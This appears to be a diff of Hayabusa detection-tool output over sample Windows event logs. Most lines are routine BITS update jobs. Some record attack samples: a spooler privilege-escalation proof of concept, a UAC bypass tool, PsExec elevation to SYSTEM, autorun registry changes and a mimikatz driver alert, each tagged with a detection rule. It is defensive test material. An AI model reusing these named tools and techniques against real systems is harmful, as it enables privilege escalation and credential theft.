+2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:25.377 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-22 00:54:59.449 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 19:52:42.355 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 18:57:59.420 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Chrome Component Updater  :  URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,"Command: pocacct.exe  payload.dll  :  Path: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe  :  User: 3B\lgreen  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
+2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
+2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\System32\spoolsv.exe  :  Path: C:\Windows\System32\spoolsv.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
+2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: byeintegrity5-uac.exe  :  Path: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
+2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
+2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: taskhostw.exe $(Arg0)  :  Path: C:\Windows\System32\taskhostw.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
+2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: taskhostw.exe $(Arg0)",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
+2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-05 07:41:04.542 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe  :  Path: C:\Users\Public\psexecprivesc.exe  :  User: MSEDGEWIN10\user02  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\PSEXESVC.exe  :  Path: C:\Windows\PSEXESVC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍  :  Path: C:\Windows\System32\mspaint.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\PSEXESVC.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding  :  Path: C:\Windows\System32\wbem\WmiPrvSE.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
+2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
+2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha  :  Severity: High  :  Type: Tool  :  User: OFFSEC\admmig  :  Path: file:_C:\Users\admmig\Documents\mimidrv.sys  :  Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
